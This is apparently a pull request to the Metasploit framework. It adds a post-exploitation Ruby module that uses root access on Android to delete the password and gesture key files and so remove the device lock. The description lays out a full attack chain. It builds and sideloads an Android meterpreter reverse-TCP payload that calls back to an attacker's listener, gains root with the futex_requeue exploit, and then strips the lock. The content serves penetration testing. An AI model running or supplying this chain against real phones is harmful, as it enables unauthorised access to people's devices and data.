### PR TITLE
Add remove lockscreen for Android

### DIFF
--- a/modules/post/android/manage/remove_lock_root.rb
+++ b/modules/post/android/manage/remove_lock_root.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::Common
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Android Root Remove Device Locks",
+        'Description'   => %q{
+            This module uses root privileges to remove the device lock.
+            In some cases the original lock method will still be present but any key/gesture will
+            unlock the device.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'timwr' ],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'      => 'android',
+      }
+    ))
+  end
+
+  def run
+    id = cmd_exec('id')
+    unless id =~ /root/
+      print_error("This module requires root permissions")
+      return
+    end
+
+    cmd_exec('rm /data/system/password.key')
+    cmd_exec('rm /data/system/gesture.key')
+  end
+
+end
+


### PR DESCRIPTION
This module adds a quick way to remove the device lock on Android:
You will need a handler and an android device attached with adb:
- [ ] `LHOST=$(hostname -I); ./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`

Use the futex_requeue exploit to gain root on the device (you will need a vulnerable device):

```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o "$1"
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA "$1" androiddebugkey
adb install "$1"
adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
# on the handler:
use exploit/android/local/futex_requeue
set LHOST <tab>
set LPORT 4445
set session 1
exploit
```
- [ ] use the module

```
use post/android/manage/remove_lock_root.rb
set session 2
exploit
```
- [ ] If the lock screen is currently active, any gesture/key should be valid to unlock the device.
- [ ] If not it should revert back to slide to unlock.
